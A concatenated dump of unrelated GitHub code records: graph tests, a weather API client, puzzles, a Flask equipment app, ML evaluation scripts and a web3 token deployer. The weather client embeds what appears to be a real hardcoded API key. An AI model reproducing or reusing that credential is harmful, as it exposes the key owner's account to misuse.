print(\"Mid file does not contains track names or the channels are not in chronological order\")","repo_name":"nissimanjayil/Investigating-melody-complexity-in-polyphonic-music","sub_path":"Computational analysis/Saliency based model/MidiSplit.py","file_name":"MidiSplit.py","file_ext":"py","file_size_in_byte":2265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71587585121","text":"import json\nimport os\nimport tempfile\nfrom collections import Counter\n\nimport dgl\n\nimport pytest\nfrom change_etype_to_canonical_etype import convert_conf, is_old_version\nfrom dgl.distributed import partition_graph\nfrom scipy import sparse as spsp\n\n\ndef create_random_hetero(type_n, node_n):\n num_nodes = {}\n for i in range(1, type_n + 1):\n num_nodes[f\"n{i}\"] = node_n\n c_etypes = []\n count = 0\n for i in range(1, type_n):\n for j in range(i + 1, type_n + 1):\n count += 1\n c_etypes.append((f\"n{i}\", f\"r{count}\", f\"n{j}\"))\n edges = {}\n for etype in c_etypes:\n src_ntype, _, dst_ntype = etype\n arr = spsp.random(\n num_nodes[src_ntype],\n num_nodes[dst_ntype],\n density=0.001,\n format=\"coo\",\n random_state=100,\n )\n edges[etype] = (arr.row, arr.col)\n return dgl.heterograph(edges, num_nodes), [\n \":\".join(c_etype) for c_etype in c_etypes\n ]\n\n\n@pytest.mark.parametrize(\n \"type_n, node_n, num_parts\", [[3, 100, 2], [10, 500, 4], [10, 1000, 8]]\n)\ndef test_hetero_graph(type_n, node_n, num_parts):\n g, expected_c_etypes = create_random_hetero(type_n, node_n)\n do_convert_and_check(g, \"convert_conf_test\", num_parts, expected_c_etypes)\n\n\n@pytest.mark.parametrize(\"node_n, num_parts\", [[100, 2], [500, 4]])\ndef test_homo_graph(node_n, num_parts):\n g = dgl.rand_graph(node_n, node_n // 10)\n do_convert_and_check(g, \"convert_conf_test\", num_parts, [\"_N:_E:_N\"])\n\n\ndef do_convert_and_check(g, graph_name, num_parts, expected_c_etypes):\n with tempfile.TemporaryDirectory() as root_dir:\n partition_graph(g, graph_name, num_parts, root_dir)\n part_config = os.path.join(root_dir, graph_name + \".json\")\n old_config = _get_old_config(part_config)\n # Call convert function\n convert_conf(part_config)\n with open(part_config, \"r\") as config_f:\n config = json.load(config_f)\n # Check we get all canonical etypes\n assert Counter(expected_c_etypes) == Counter(\n config[\"etypes\"].keys()\n )\n # Check the id is match after transform from etypes -> canonical\n assert old_config[\"etypes\"] == _extract_etypes(config[\"etypes\"])\n\n\ndef _get_old_config(part_config):\n with open(part_config, \"r+\") as config_f:\n config = json.load(config_f)\n if not is_old_version(config):\n config[\"etypes\"] = _extract_etypes(config[\"etypes\"])\n config[\"edge_map\"] = _extract_edge_map(config[\"edge_map\"])\n config_f.seek(0)\n json.dump(config, config_f, indent=4)\n config_f.truncate()\n return config\n\n\ndef _extract_etypes(c_etypes):\n etypes = {}\n for c_etype, eid in c_etypes.items():\n etype = c_etype.split(\":\")[1]\n etypes[etype] = eid\n return etypes\n\n\ndef _extract_edge_map(c_edge_map):\n edge_map = {}\n for c_etype, emap in c_edge_map.items():\n etype = c_etype.split(\":\")[1]\n edge_map[etype] = emap\n return edge_map\n","repo_name":"dmlc/dgl","sub_path":"tests/tools/test_change_etype_to_canonical_etype.py","file_name":"test_change_etype_to_canonical_etype.py","file_ext":"py","file_size_in_byte":3078,"program_lang":"python","lang":"en","doc_type":"code","stars":12455,"dataset":"github-code","pt":"54"} +{"seq_id":"42465812887","text":"import requests\n\n\ndef get_wind_direction(degrees):\n if 350 <= degrees <= 10:\n return 'North'\n elif 10 < degrees < 80:\n return 'North-East'\n elif 80 <= degrees <= 100:\n return 'East'\n elif 100 < degrees < 170:\n return 'South-East'\n elif 170 <= degrees <= 190:\n return 'South'\n elif 190 < degrees < 260:\n return 'South-West'\n elif 260 <= degrees <= 280:\n return 'West'\n elif 280 < degrees < 350:\n return 'North-West'\n\n\ndef get_weather_info(c_name):\n \"\"\"\n get weather information from www.openweathermap.org\n :param c_name: string - name of the city to get the forecast for\n :return: a list of strings comprising the weather forecast.\n \"\"\"\n API_KEY = 'f2c8b1dae6135bc74ca9d95ab020d77a'\n BASE_URL = 'http://api.openweathermap.org/data/2.5/weather'\n\n request_url = f'{BASE_URL}?appid={API_KEY}&q={c_name}'\n response = requests.get(request_url)\n\n if response.status_code == 200:\n data = response.json()\n print(data)\n a = f'Current weather for {c_name}:'\n b = data['weather'][0]['main']\n c = data['weather'][0]['description']\n d = f\"Temperature: {round(data['main']['temp'] - 273.15, 2)} degrees celsius\"\n e = f\"Feels like: {round(data['main']['feels_like'] - 273.15, 2)} degrees celsius\"\n f = f\"Pressure: {data['main']['pressure']} kilopascals\"\n g = f\"Humidity: {data['main']['humidity']} percent\"\n h = f\"Visibility: {data['visibility']} metres\"\n i = f\"Wind speed: {data['wind']['speed']} meters per second\"\n j = f\"Wind direction: {get_wind_direction(data['wind']['deg'])}\"\n\n return [a, b, c, d, e, f, g, h, i, j]\n else:\n return f'weather forecast unsuccessful'\n","repo_name":"Ilian-Kossev/virtual-assistant","sub_path":"weather_api.py","file_name":"weather_api.py","file_ext":"py","file_size_in_byte":1768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"13881041678","text":"'''\nProgram to solve the water jug problem using state space search\n'''\n\nj1 = 0\nj2 = 0\nx = 4\ny = 3\nprint(\"Initial state: (0, 0)\")\nprint(\"Capacities: (4, 3)\")\nprint(\"Goal state: (2, 0 or any number)\")\n\nwhile j1 != 2:\n r = int(input(\"Enter the rule: \"))\n if (r == 1):\n j1 = x\n elif (r == 2):\n j2 = y\n elif (r == 3):\n j1 = 0\n elif (r == 4):\n j2 = 0\n elif (r == 5):\n t = y-j2\n j2 = y\n j1 -= t\n if j1 < 0:\n j1 = 0\n elif (r == 6):\n t = x-j1\n j1 = x\n j2 -= t\n if j2 < 0:\n j2 = 0\n elif (r == 7):\n j2 += j1\n j1 = 0\n if j2 > y:\n j2 = y\n elif (r == 8):\n j1 += j2\n j2 = 0\n if j1 > x:\n j1 = x\n print(j1, j2)\n","repo_name":"sthsuyash/CSIT_Labs","sub_path":"4th_Semester/AI/waterjug.py","file_name":"waterjug.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"54"} +{"seq_id":"17729320585","text":"from ursinanetworking import *\n\nServer = UrsinaNetworkingServer(\"localhost\", 25565)\n\n@Server.event\ndef requestFile(Client, Content):\n print(f\"Ok {Client} ! I will send you the file :D\")\n Client.send_message(\"receiveFile\", ursina_networking_encode_file(\"my_image.png\"))\n\nwhile True:\n Server.process_net_events()","repo_name":"kstzl/UrsinaNetworking","sub_path":"ursinanetworking/examples/send_files/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","stars":61,"dataset":"github-code","pt":"54"} +{"seq_id":"45373358442","text":"import time\nfrom web3 import Web3\nfrom solcx import compile_source\nimport json\nimport solcx\nwith open('FKconfig(Ropsten).json') as f:\n configf = json.load(f)\nconfig=configf[\"AVALANCHE\"]\nw3 = Web3(Web3.HTTPProvider(config[\"RPC_URL\"]))\n\nwethaddress = config[\"WETH_ADDRESS\"]\nuniswapaddress = config[\"ROUTER_ADDRESS\"]\nlockaddress = config[\"LOCK_ADDRESS\"]\ndeployer = w3.eth.account.privateKeyToAccount(config[\"DEPLOYER_KEY\"])\nbuyer = w3.eth.account.privateKeyToAccount(config[\"BUYER_KEY\"])\nfreezer = w3.eth.account.privateKeyToAccount(config[\"FREEZER_KEY\"])\nseller = w3.eth.account.privateKeyToAccount(config[\"SELLER_KEY\"])\ndeployernonce = w3.eth.getTransactionCount(deployer.address)\nbuyernonce = w3.eth.getTransactionCount(buyer.address)\nfreezernonce = w3.eth.getTransactionCount(freezer.address)\n\nwith open ('tokenname','r') as file:\n tokenname = file.read()\n\nwith open('uniswapabi', 'r') as file:\n uniswapabi = file.read()\nuniswapinstance =w3.eth.contract(address=uniswapaddress, abi=uniswapabi )\nbuytoken = uniswapinstance.get_function_by_name('swapExactETHForTokens')\n\nsolcx.set_solc_version_pragma(\"pragma solidity 0.6.12;\")\ncompiled_sol = solcx.compile_files(['TestContract.sol', 'address.sol'])\ncontract_interface = compiled_sol.pop(\"TestContract.sol:\"+tokenname)\n\ncontract_ = w3.eth.contract(\n abi=contract_interface['abi'],\n bytecode=contract_interface['bin'])\nabi = contract_.abi\n\nconstruct_txn = contract_.constructor().buildTransaction({\n 'from': deployer.address,\n 'nonce': deployernonce,\n 'gas': 4712388,\n 'gasPrice': w3.toWei('5', 'gwei')})\nsigned=deployer.signTransaction(construct_txn)\nc1=w3.eth.sendRawTransaction(signed.rawTransaction)\n\ntime.sleep(60)\ndeployernonce+=1\ntxn_receipt = w3.eth.get_transaction_receipt(c1)\nContractAddress = txn_receipt['contractAddress']\nprint(ContractAddress)\n\ncontract_instance = w3.eth.contract(address=ContractAddress, abi=abi)\naddLiquidity=contract_instance.get_function_by_name(\"addLiquidity\")\n\nunsignaddtx = addLiquidity().buildTransaction({\n 'from': deployer.address,\n 'nonce': deployernonce,\n 'gas': 4712388,\n 'gasPrice': w3.toWei('5', 'gwei'),\n 'value':w3.toWei('0.1','ether')\n})\nsigned=deployer.signTransaction(unsignaddtx)\nc1=w3.eth.sendRawTransaction(signed.rawTransaction)\n\nwith open ('ContractAddress', 'w') as file:\n file.write(ContractAddress)","repo_name":"bryandong24/SolidityAlgo","sub_path":"frontrunkiller(deployer).py","file_name":"frontrunkiller(deployer).py","file_ext":"py","file_size_in_byte":2350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71561312482","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Feb 20 19:13:22 2020\n\n@author: atakb\n\"\"\"\n\n# Fonksiyon 3 elemanlı ise bu elemanların bir üçgen belirtip belirtmediği\n# 4 elemanlı ise dörtgeni oluşturduğunu söyleyecek.\n\ndef Geometry(shape):\n if(len(shape) == 3):\n a = shape[0]\n b = shape[1]\n c = shape[2]\n \n if((a+b)>c and (b+c)>a and (a+c)>b): #Üçgen belirtir.\n if(a==b and a==c and b==c):\n print(\"Eşkenar üçgen.\")\n elif((a==b and a==c) or (a==b and b==c) or (a==c and b==c)):\n print(\"İkizkenar üçgen.\")\n else:\n print(\"Çeşitkenar üçgen.\")\n else:\n print(\"Üçgen belirtmiyor!!!\")\n elif(len(shape) == 4):\n a = shape[0]\n b = shape[1]\n c = shape[2]\n d = shape[3]\n if(a==b and b==c and c==d):\n print(\"Kare.\")\n elif(a==c and b==d):\n print(\"Dikdörtgen.\")\n else:\n print(\"Normal dörtgen.\")\n \n \nwhile True:\n value_count = int(input(\"Eleman sayısını giriniz:\"))\n \n if(value_count == 3):\n a = int(input(\"a =\"))\n b = int(input(\"b =\"))\n c = int(input(\"c =\"))\n Geometry([a,b,c])\n elif(value_count == 4):\n a = int(input(\"a =\"))\n b = int(input(\"b =\"))\n c = int(input(\"c =\"))\n d = int(input(\"d =\"))\n Geometry([a,b,c,d]) \n else:\n print(\"Tekrar deneyiniz...\")\n \n \n \n \n \n \n ","repo_name":"BarisATAK/Python_Practise","sub_path":"14_geometry_example.py","file_name":"14_geometry_example.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71587234081","text":"\"\"\" load dataset from ogb \"\"\"\n\nimport argparse\nimport time\n\nfrom ogb.linkproppred import DglLinkPropPredDataset\n\n\ndef load_from_ogbl_with_name(name):\n choices = [\"ogbl-collab\", \"ogbl-ddi\", \"ogbl-ppa\", \"ogbl-citation\"]\n assert name in choices, \"name must be selected from \" + str(choices)\n dataset = DglLinkPropPredDataset(name)\n return dataset[0]\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--name\",\n type=str,\n choices=[\"ogbl-collab\", \"ogbl-ddi\", \"ogbl-ppa\", \"ogbl-citation\"],\n default=\"ogbl-collab\",\n help=\"name of datasets by ogb\",\n )\n args = parser.parse_args()\n\n print(\"loading graph... it might take some time\")\n name = args.name\n g = load_from_ogbl_with_name(name=name)\n\n try:\n w = g.edata[\"edge_weight\"]\n weighted = True\n except:\n weighted = False\n\n edge_num = g.edges()[0].shape[0]\n src = list(g.edges()[0])\n tgt = list(g.edges()[1])\n if weighted:\n weight = list(g.edata[\"edge_weight\"])\n\n print(\"writing...\")\n start_time = time.time()\n with open(name + \"-net.txt\", \"w\") as f:\n for i in range(edge_num):\n if weighted:\n f.write(\n str(src[i].item())\n + \" \"\n + str(tgt[i].item())\n + \" \"\n + str(weight[i].item())\n + \"\\n\"\n )\n else:\n f.write(\n str(src[i].item()) + \" \" + str(tgt[i].item()) + \" \" + \"1\\n\"\n )\n print(\"writing used time: %d s\" % int(time.time() - start_time))\n","repo_name":"dmlc/dgl","sub_path":"examples/pytorch/ogb/deepwalk/load_dataset.py","file_name":"load_dataset.py","file_ext":"py","file_size_in_byte":1668,"program_lang":"python","lang":"en","doc_type":"code","stars":12455,"dataset":"github-code","pt":"54"} +{"seq_id":"8091849514","text":"from flask import render_template, url_for, flash, redirect, request, Blueprint\nfrom flask_login import login_required\n\nfrom app.models import (Equipamento, RelatorioEquipamento, TipoEquipamento, \n Solicitacao, admin_required)\nfrom app.forms.equipamentos import (EquipamentoForm, IndisponibilizaEquipamentoForm,\n AtualizaEquipamentoForm, TipoEquipamentoForm,\n RelatorioEquipamentoForm, AtualizaRelatorioEquipamentoForm)\n\nequipamentos = Blueprint('equipamentos', __name__)\n\n\n@equipamentos.route(\"/\")\n@login_required\n@admin_required\ndef equipamento(eqp_id):\n # Recupera as últimas solicitações associadas ao equipamento\n equipamento = Equipamento.recuperar_id(eqp_id)\n solicitacoes = Solicitacao.recuperar_ultimas_eqp(equipamento, 3)\n return render_template('equipamentos/equipamento.html', \n title=equipamento, equipamento=equipamento,\n solicitacoes=solicitacoes)\n\n\n@equipamentos.route(\"/novo\", methods=['GET', 'POST'])\n@login_required\n@admin_required\ndef novo_equipamento():\n # Preenche a lista de seleção de tipos de equipamento \n # de acordo com o retornado pelo banco de dados\n form = EquipamentoForm()\n tipos_eqp = TipoEquipamento.recuperar_tudo()\n lista_tipos=[(tipo.id, tipo.nome) for tipo in tipos_eqp]\n if lista_tipos:\n form.tipo_eqp.choices = lista_tipos\n else:\n flash('Não há tipos de equipamento cadastrados.', 'warning')\n return redirect(url_for('principal.inicio', tab=3))\n \n # Valida os dados do formulário enviado e insere um \n # novo registro de equipamento no banco de dados\n if form.validate_on_submit():\n equipamento = Equipamento.criar(form)\n equipamento.inserir()\n flash('O equipamento foi cadastrado com sucesso!', 'success') \n return redirect(url_for('principal.inicio', tab=3))\n\n return render_template('equipamentos/novo_equipamento.html', \n title='Novo Equipamento',\n legend='Novo Equipamento', form=form)\n\n\n@equipamentos.route(\"/novo_tipo\", methods=['GET', 'POST'])\n@login_required\n@admin_required\ndef novo_tipo_equipamento():\n # Valida os dados do formulário enviado e insere um \n # novo registro de tipo de equipamento no banco de dados\n form = TipoEquipamentoForm()\n if form.validate_on_submit():\n tipo_eqp = TipoEquipamento.criar(form)\n tipo_eqp.inserir()\n flash('O tipo de equipamento foi cadastrado com sucesso!', 'success') \n return redirect(url_for('principal.inicio', tab=3))\n\n return render_template('equipamentos/novo_tipo_equipamento.html', \n title='Novo Tipo de Equipamento', form=form,\n legend='Novo Tipo de Equipamento')\n\n\n@equipamentos.route(\"//atualizar\", methods=['GET', 'POST'])\n@login_required\n@admin_required\ndef atualiza_equipamento(eqp_id):\n # Valida o formulário enviado e atualiza o registro\n # do equipamento no banco de dados de acordo com ele\n equipamento = Equipamento.recuperar_id(eqp_id)\n form = AtualizaEquipamentoForm()\n if form.validate_on_submit():\n equipamento.atualizar(form)\n flash('O equipamento foi atualizado com sucesso!', 'success') \n return redirect(url_for('principal.inicio', tab=3))\n elif request.method == 'GET':\n form.descricao.data = equipamento.descricao\n\n return render_template('equipamentos/atualizar_equipamento.html', \n title='Atualizar Equipamento', form=form,\n legend='Atualizar Equipamento')\n\n\n@equipamentos.route(\"//disponibilizar\", methods=['GET', 'POST'])\n@login_required\n@admin_required\ndef disponibiliza_equipamento(eqp_id):\n # Valida os dados do formulário enviado e altera o status\n # do equipamento escolhido para 'Disponível'\n equipamento = Equipamento.recuperar_id(eqp_id)\n if equipamento.verificar_disponibilidade():\n flash('Esse equipamento já está disponível.', 'warning')\n return redirect(url_for('principal.inicio', tab=3))\n\n # Atualiza os registros do equipamento e do seu tipo\n equipamento.disponibilizar()\n flash('O equipamento foi disponibilizado com sucesso!', 'success') \n return redirect(url_for('principal.inicio', tab=3))\n\n\n@equipamentos.route(\"//indisponibilizar\", methods=['GET', 'POST'])\n@login_required\n@admin_required\ndef indisponibiliza_equipamento(eqp_id):\n # Valida os dados do formulário enviado e altera o status\n # do equipamento escolhido para 'Indisponível'\n form = IndisponibilizaEquipamentoForm()\n if form.validate_on_submit():\n equipamento = Equipamento.recuperar_id(eqp_id)\n if not equipamento.verificar_disponibilidade():\n flash('Você não pode tornar este equipamento indisponível.', 'warning')\n return redirect(url_for('principal.inicio', tab=3))\n\n # Atualiza os registros do equipamento e do seu tipo\n equipamento.indisponibilizar(form)\n flash('O equipamento foi indisponibilizado com sucesso!', 'success') \n return redirect(url_for('principal.inicio', tab=3))\n\n return render_template('equipamentos/indisponibilizar_equipamento.html', \n title='Indisponibilizar Equipamento',\n legend='Indisponibilizar Equipamento', form=form)\n\n\n@equipamentos.route(\"//excluir\", methods=['POST'])\n@login_required\n@admin_required\ndef exclui_equipamento(eqp_id):\n # Impede um equipamento de ser indevidamente excluído\n equipamento = Equipamento.recuperar_id(eqp_id)\n if not equipamento.verificar_disponibilidade():\n if not equipamento.verificar_desabilitado():\n flash('Não é possível excluir uma equipamento\\\n solicitado ou em uso.', 'warning')\n return redirect(url_for('principal.inicio', tab=3))\n\n # Desativa o registro do equipamento\n equipamento.excluir()\n flash('O equipamento foi excluído com sucesso!', 'success')\n return redirect(url_for('principal.inicio', tab=3))\n\n \n@equipamentos.route(\"//relatorios\", methods=['GET', 'POST'])\n@login_required\n@admin_required\ndef relatorios(eqp_id):\n # Recupera todos os relatórios do equipamento\n equipamento = Equipamento.recuperar_id(eqp_id)\n relatorios = RelatorioEquipamento.recuperar_tudo_eqp(equipamento)\n\n return render_template('equipamentos/relatorios.html', \n title='Relatórios do Equipamento',\n legend='Relatórios do Equipamento',\n relatorios=relatorios, eqp_id=eqp_id)\n\n\n@equipamentos.route(\"//relatorios/novo\", methods=['GET', 'POST'])\n@login_required\n@admin_required\ndef novo_relatorio(eqp_id):\n # Valida o formulário e insere o novo relatório no banco de dados\n equipamento = Equipamento.recuperar_id(eqp_id)\n form = RelatorioEquipamentoForm()\n if form.validate_on_submit():\n relatorio = RelatorioEquipamento.criar(equipamento.id, form)\n relatorio.inserir()\n flash('O relatório foi cadastrado com sucesso!', 'success') \n return redirect(url_for('equipamentos.relatorios', eqp_id=eqp_id))\n\n return render_template('equipamentos/novo_relatorio.html', \n title='Novo Relatório', eqp_id=eqp_id,\n legend='Novo Relatório', form=form)\n\n\n@equipamentos.route(\"//relatorios//atualizar\", methods=['GET', 'POST'])\n@login_required\n@admin_required\ndef atualiza_relatorio(eqp_id, relatorio_id):\n # Impede relatórios finalizados de serem atualizados\n relatorio = RelatorioEquipamento.recuperar_id(relatorio_id)\n if not relatorio.verificar_aberto():\n flash('Este relatório já foi finalizado.', 'warning') \n return redirect(url_for('equipamentos.relatorios', eqp_id=eqp_id))\n\n # Valida o formulário e atualiza o relatório no banco de dados\n form = AtualizaRelatorioEquipamentoForm()\n if form.validate_on_submit():\n relatorio.atualizar(form)\n flash('O relatório foi atualizado com sucesso!', 'success') \n return redirect(url_for('equipamentos.relatorios', eqp_id=eqp_id))\n elif request.method == 'GET':\n form.tipo.data = relatorio.tipo_relatorio.value\n form.conteudo.data = relatorio.conteudo\n form.manutencao.data = relatorio.manutencao\n form.defeito.data = relatorio.defeito\n form.detalhes.data = relatorio.detalhes\n form.finalizar.data = False\n\n return render_template('equipamentos/atualizar_relatorio.html', \n title='Atualizar Relatório', eqp_id=eqp_id,\n legend='Atualizar Relatório', form=form)\n ","repo_name":"DWNeo/UniGerencia","sub_path":"app/controllers/equipamentos.py","file_name":"equipamentos.py","file_ext":"py","file_size_in_byte":8877,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"24811781235","text":"\"\"\"eval_time.py\n\nAuthor: Victor T. N.\n\"\"\"\n\n\nimport numpy as np\nimport os\nfrom human.model.human import HuMAn\nfrom human.utils import dataset\nos.environ[\"TF_CPP_MIN_LOG_LEVEL\"] = \"1\" # Hide unnecessary TF messages\nimport tensorflow as tf # noqa: E402\n\n\nif __name__ == \"__main__\":\n # Path where the TFRecords are located\n tfr_home = \"../../AMASS/tfrecords\"\n # Load the validation dataset\n parsed_ds = dataset.folder_to_dataset(\n os.path.join(tfr_home, \"valid_1024\"))\n # Load the HuMAn neural network\n model = HuMAn()\n # Load weights from saved model\n saves_path = \"../training/saves/train_universal\"\n model.load_weights(saves_path)\n # Create variables to store mean and stdev for each time frame'\n mean = np.zeros(1024)\n stdev = np.zeros(1024)\n # Create another array, to accumulate the number of data points\n pts = np.zeros(1024)\n # Iterate through a number of horizon frames\n for horizon_frames in range(1, 11):\n # Load the evaluation dataset\n mapped_ds = parsed_ds.map(lambda x: dataset.map_dataset(\n x, skeleton=\"full_body\", horizon_frames=horizon_frames),\n num_parallel_calls=tf.data.AUTOTUNE, deterministic=True)\n eval_ds = mapped_ds.batch(64).prefetch(tf.data.AUTOTUNE)\n # Predict\n print(f\"Predicting with horizon_frames={horizon_frames}\")\n prediction = model.predict(eval_ds, verbose=1)\n # Create the reference dataset\n # All sequences are joined in a single large batch\n reference_ds = (mapped_ds.batch(prediction.shape[0])\n .prefetch(tf.data.AUTOTUNE))\n # Extract the values as NumPy arrays\n inputs, pose_targets = next(reference_ds.as_numpy_iterator())\n # Compute the absolute error between targets and predictions\n abs_err = np.abs(prediction - pose_targets)\n # Extract horizon time from \"inputs\"\n horizon_input = np.round(inputs[\"horizon_input\"][:, 0, 0], 4)\n # Look for invalid predictions\n delete = []\n for n in range(horizon_input.shape[0]):\n # A \"horizon_input\" zeroed out means an impossible shift\n if horizon_input[n] == 0:\n # Mark for deletion\n delete.append(n)\n # Remove the invalid predicitons\n abs_err = np.delete(abs_err, delete, axis=0)\n # Compute the number of data points for a single time step\n step_pts = abs_err.shape[0]*abs_err.shape[2]\n # Compute mean and standard deviation for each time step\n step_mean = np.mean(abs_err, axis=(0, 2))\n step_stdev = np.std(abs_err, axis=(0, 2))\n # Compute new global values\n new_pts = pts + step_pts\n new_mean = (pts*mean + step_pts*step_mean) / new_pts\n new_stdev = np.sqrt((\n pts*stdev**2 + step_pts*step_stdev**2 +\n pts*step_pts*(mean - step_mean)**2 / new_pts) /\n new_pts)\n # Update\n mean = new_mean\n stdev = new_stdev\n pts = new_pts\n # Save values to a NumPy npz file\n np.savez(\"time/time.npz\", mean=mean, stdev=stdev)\n","repo_name":"Vtn21/HuMAn","sub_path":"evaluation/eval_time.py","file_name":"eval_time.py","file_ext":"py","file_size_in_byte":3113,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"28007358658","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\ngaetk2/tools/introspection.py\n\nCreated by Maximillian Dornseif on 2018-04-17.\nMIT licensed.\n\"\"\"\n\nfrom __future__ import unicode_literals\n\nimport inspect\n\n\ndef get_class_that_defined_method(meth):\n \"\"\"Find where a method is comming from.\"\"\"\n try:\n return _get_class_that_defined_method2(meth)\n except AttributeError:\n return _get_class_that_defined_method3(meth)\n except:\n raise\n\n\ndef _get_class_that_defined_method2(meth):\n 'https://stackoverflow.com/a/961057/49407'\n for cls in inspect.getmro(meth.im_class):\n if meth.__name__ in cls.__dict__:\n return cls\n return None\n\n\ndef _get_class_that_defined_method3(meth):\n 'From https://stackoverflow.com/questions/3589311/get/25959545#25959545'\n if inspect.ismethod(meth):\n for cls in inspect.getmro(meth.__self__.__class__):\n if cls.__dict__.get(meth.__name__) is meth:\n return cls\n meth = meth.__func__ # fallback to __qualname__ parsing\n if inspect.isfunction(meth):\n cls = getattr(inspect.getmodule(meth),\n meth.__qualname__.split('.', 1)[0].rsplit('.', 1)[0])\n if isinstance(cls, type):\n return cls\n return getattr(meth, '__objclass__', None) # handle special descriptor objects\n","repo_name":"mdornseif/appengine-toolkit2","sub_path":"gaetk2/tools/introspection.py","file_name":"introspection.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"2510731725","text":"import numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.datasets import make_classification\r\nfrom sklearn.ensemble import ExtraTreesClassifier\r\nfrom sklearn.cross_validation import cross_val_score\r\nfrom sklearn.datasets import make_blobs\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.ensemble import ExtraTreesClassifier\r\nfrom sklearn.ensemble import GradientBoostingClassifier\r\nfrom sklearn.tree import DecisionTreeClassifier\r\nfrom sklearn import svm\r\n\r\n\r\ndef categoricalToNumerical(v,dict=None):\r\n if not dict:\r\n dict={}\r\n biggest=len(dict)\r\n res=[]\r\n for i in v:\r\n if not i in dict:\r\n dict[i]=biggest\r\n biggest+=1\r\n res.append(dict[i])\r\n return np.array(res),biggest,dict\r\n\r\n\r\ndef getTrainData(size=None,featureIndices=None):\r\n train = pd.read_csv('../input/train.csv')\r\n train=train.fillna(0)\r\n # train=train.fillna(train.mean())\r\n train=train.values\r\n if size:\r\n train=train[:size,:]\r\n if featureIndices:\r\n indices=featureIndices\r\n else:\r\n indices=list(range(1,train.shape[1]-1))#All indices except ID and except response\r\n # print(indices)\r\n changed=categoricalToNumerical(train[:,2])\r\n dict=changed[2]\r\n print(\"number of categories of column 2 of train:\",changed[1])\r\n train[:,2]=changed[0]\r\n\r\n X, y = train[:,indices] , train[:,-1]\r\n\r\n y=list(map(np.int32,y))\r\n return X,y,dict\r\n\r\n\r\ndef getTestData(dict,size=None,featureIndices=None,):\r\n test = pd.read_csv('../input/test.csv')\r\n test=test.fillna(0)\r\n # train=train.fillna(train.mean())\r\n test=test.values\r\n if size:\r\n test=test[:size,:]\r\n if featureIndices:\r\n indices=featureIndices\r\n else:\r\n indices=list(range(1,test.shape[1]))#All indices except ID and except response\r\n # print(indices)\r\n changed=categoricalToNumerical(test[:,2],dict)\r\n print(\"number of categories of column 2 of train and test:\",changed[1])\r\n test[:,2]=changed[0]\r\n\r\n X= test[:,indices]\r\n ids=test[:,0]\r\n return X,ids\r\n\r\n\r\ndef saveToFile(predictions,ids,filename):\r\n\r\n submission = pd.DataFrame({\r\n \"Id\": ids,\r\n \"Response\": predictions\r\n })\r\n submission.to_csv(filename, index=False)\r\n\r\n\r\n\r\n# importance=[10,9,3,7,40,8,11,16,1,38,37,19,35,33,12,59,34,51,\r\n# 92,28,36,32,77,22]\r\n\r\nsize=None\r\n\r\nTest = pd.read_csv('../input/test.csv')\r\nX,y,dict=getTrainData(size=size)\r\nTest,ids=getTestData(dict,size=size)\r\n\r\nprint(\"Data loaded!\")\r\n# X=X[:,importance]\r\n# Test=Test[:,importance]\r\nclf = RandomForestClassifier(max_features=70, n_estimators=500)\r\nclf=clf.fit(X,y)\r\nytest=clf.predict(Test)\r\nprint(ytest.shape)\r\nsaveToFile(ytest,ids,\"testSubmission.csv\")\r\n\r\n","repo_name":"sajedjalil/Data-Science-Pipeline-Detector","sub_path":"dataset/prudential-life-insurance-assessment/Erfan/first-try.py","file_name":"first-try.py","file_ext":"py","file_size_in_byte":2740,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"54"} +{"seq_id":"31611738146","text":"import jax.numpy as jnp\nimport jax.random as jr\nfrom jax import vmap\nimport matplotlib.pyplot as plt\n\nfrom dynamax.hidden_markov_model import CategoricalRegressionHMM\n\nif __name__ == \"__main__\":\n key1, key2, key3, key4 = jr.split(jr.PRNGKey(0), 4)\n\n num_states = 2\n num_classes = 3\n feature_dim = 10\n num_timesteps = 20000\n\n hmm = CategoricalRegressionHMM(num_states, num_classes, feature_dim)\n transition_matrix = jnp.array([[0.95, 0.05],\n [0.05, 0.95]])\n true_params, _ = hmm.initialize(key=key1, transition_matrix=transition_matrix)\n\n inputs = jr.normal(key2, (num_timesteps, feature_dim))\n states, emissions = hmm.sample(true_params, key3, num_timesteps, inputs=inputs)\n\n # Try fitting it!\n test_hmm = CategoricalRegressionHMM(num_states, num_classes, feature_dim)\n params, props = test_hmm.initialize(key=key4)\n params, lps = test_hmm.fit_em(params, props, emissions, inputs=inputs, num_iters=100)\n\n # Plot the data and predictions\n # Compute the most likely states\n most_likely_states = test_hmm.most_likely_states(params, emissions, inputs=inputs)\n\n # Predict the emissions given the true states\n As = params[\"emissions\"][\"weights\"][most_likely_states]\n bs = params[\"emissions\"][\"biases\"][most_likely_states]\n predictions = vmap(lambda x, A, b: A @ x + b)(inputs, As, bs)\n predictions = jnp.argmax(predictions, axis=1)\n\n offsets = 3 * jnp.arange(num_classes)\n plt.imshow(most_likely_states[None, :],\n extent=(0, num_timesteps, -3, 3 * num_classes),\n aspect=\"auto\",\n cmap=\"Greys\",\n alpha=0.5)\n plt.plot(emissions)\n plt.plot(predictions, ':k')\n plt.xlim(0, 